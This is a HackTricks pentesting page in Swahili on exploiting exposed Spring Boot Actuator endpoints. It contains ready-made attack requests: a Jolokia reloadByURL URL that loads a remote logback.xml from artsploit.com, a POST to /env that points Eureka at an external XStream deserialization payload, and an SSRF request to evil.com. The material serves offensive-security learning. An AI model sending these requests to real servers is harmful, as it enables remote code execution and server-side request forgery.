Spring Actuators

Reading time: 3 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Spring Auth Bypass

Kutoka https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png****

Kutumia Spring Boot Actuators

Angalia chapisho la asili kutoka [https://www.veracode.com/blog/research/exploiting-spring-boot-actuators]

Mambo Muhimu:

  • Spring Boot Actuators inasajili mwisho kama /health, /trace, /beans, /env, n.k. Katika toleo la 1 hadi 1.4, mwisho haya yanapatikana bila uthibitisho. Kuanzia toleo la 1.5 na kuendelea, tu /health na /info hazina hatari kwa default, lakini waendelezaji mara nyingi huondoa usalama huu.
  • Baadhi ya mwisho za Actuator zinaweza kufichua data nyeti au kuruhusu vitendo vya hatari:
  • /dump, /trace, /logfile, /shutdown, /mappings, /env, /actuator/env, /restart, na /heapdump.
  • Katika Spring Boot 1.x, actuators zinasajiliwa chini ya URL ya mzizi, wakati katika 2.x, ziko chini ya njia ya msingi /actuator/.

Mbinu za Kutumia:

  1. Utekelezaji wa Kanuni ya Kijijini kupitia '/jolokia':
  • Mwisho wa actuator /jolokia unafichua Maktaba ya Jolokia, ambayo inaruhusu ufikiaji wa HTTP kwa MBeans.
  • Kitendo cha reloadByURL kinaweza kutumika kuhamasisha mipangilio ya uandishi kutoka URL ya nje, ambayo inaweza kusababisha XXE ya kipofu au Utekelezaji wa Kanuni ya Kijijini kupitia mipangilio ya XML iliyoundwa.
  • Mfano wa URL ya kutumia: http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml.
  1. Mabadiliko ya Mipangilio kupitia '/env':
  • Ikiwa Maktaba za Spring Cloud zipo, mwisho wa /env unaruhusu mabadiliko ya mali za mazingira.
  • Mali zinaweza kubadilishwa ili kutumia udhaifu, kama udhaifu wa deserialization wa XStream katika huduma ya Eureka serviceURL.
  • Mfano wa ombi la POST la kutumia:
POST /env HTTP/1.1
Host: 127.0.0.1:8090
Content-Type: application/x-www-form-urlencoded
Content-Length: 65

eureka.client.serviceUrl.defaultZone=http://artsploit.com/n/xstream
  1. Mipangilio Mingine ya Faida:
  • Mali kama spring.datasource.tomcat.validationQuery, spring.datasource.tomcat.url, na spring.datasource.tomcat.max-active zinaweza kubadilishwa kwa matumizi mbalimbali, kama injection ya SQL au kubadilisha nyuzi za muunganisho wa database.

Taarifa Zaidi:

  • Orodha kamili ya actuators za default inaweza kupatikana hapa.
  • Mwisho wa /env katika Spring Boot 2.x unatumia muundo wa JSON kwa mabadiliko ya mali, lakini dhana ya jumla inabaki sawa.

Mada Zinazohusiana:

  1. Env + H2 RCE:
  • Maelezo kuhusu kutumia mchanganyiko wa mwisho wa /env na database ya H2 yanaweza kupatikana hapa.
  1. SSRF kwenye Spring Boot Kupitia Tafsiri Mbaya ya Njia:
  • Usimamizi wa mfumo wa Spring wa vigezo vya matrix (;) katika njia za HTTP unaweza kutumika kwa Server-Side Request Forgery (SSRF).
  • Mfano wa ombi la kutumia:
http
GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks